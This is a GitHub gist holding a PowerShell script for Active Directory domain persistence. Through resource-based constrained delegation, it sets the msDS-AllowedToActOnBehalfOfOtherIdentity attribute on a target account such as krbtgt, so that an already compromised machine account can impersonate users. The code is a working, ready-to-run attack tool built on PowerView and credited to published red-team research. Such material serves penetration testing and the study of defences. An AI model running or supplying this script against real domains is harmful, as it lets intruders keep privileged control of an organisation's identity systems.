Created
August 22, 2019 13:10
-
-
Save mgeeky/54ced6521bcd6524d5d0e849555ee67c to your computer and use it in GitHub Desktop.
Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object, allowing incoming trust to the previously compromised Machine object, as described by Elad Shamir in his: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Unconstrained Domain Persistence helper | |
# | |
# Usage: | |
# PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1 | |
# PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -TargetComputer COMPROMISED$ | |
# | |
# Will allow for COMPROMISED$ machine account to perform S4U2 constrained delegation by the use | |
# of Resource-Based Constrained Delegation flavour attack. | |
# | |
# Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object, | |
# allowing incoming trust to the previously compromised Machine object, as described | |
# by Elad Shamir in his: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence | |
# | |
# This script requires PowerView to be loaded first. | |
# | |
# This is basically rewritten script from Harmj0y's blog post here: | |
# https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/ | |
# all credits goes to magnificent Harmj0y! | |
# | |
function Set-PrincipalAllowedToDelegateToAccount | |
{ | |
Param | |
( | |
[Parameter(Position = 0)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$TargetUser, | |
[Parameter(Position = 1)] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$TargetComputer | |
) | |
# translate the identity to a security identifier | |
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $TargetComputer).Translate([System.Security.Principal.SecurityIdentifier])).Value | |
# Substitute the security identifier into the raw SDDL | |
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))" | |
# get the binary bytes for the SDDL | |
$SDBytes = New-Object byte[] ($SD.BinaryLength) | |
$SD.GetBinaryForm($SDBytes, 0) | |
# set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity' | |
Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment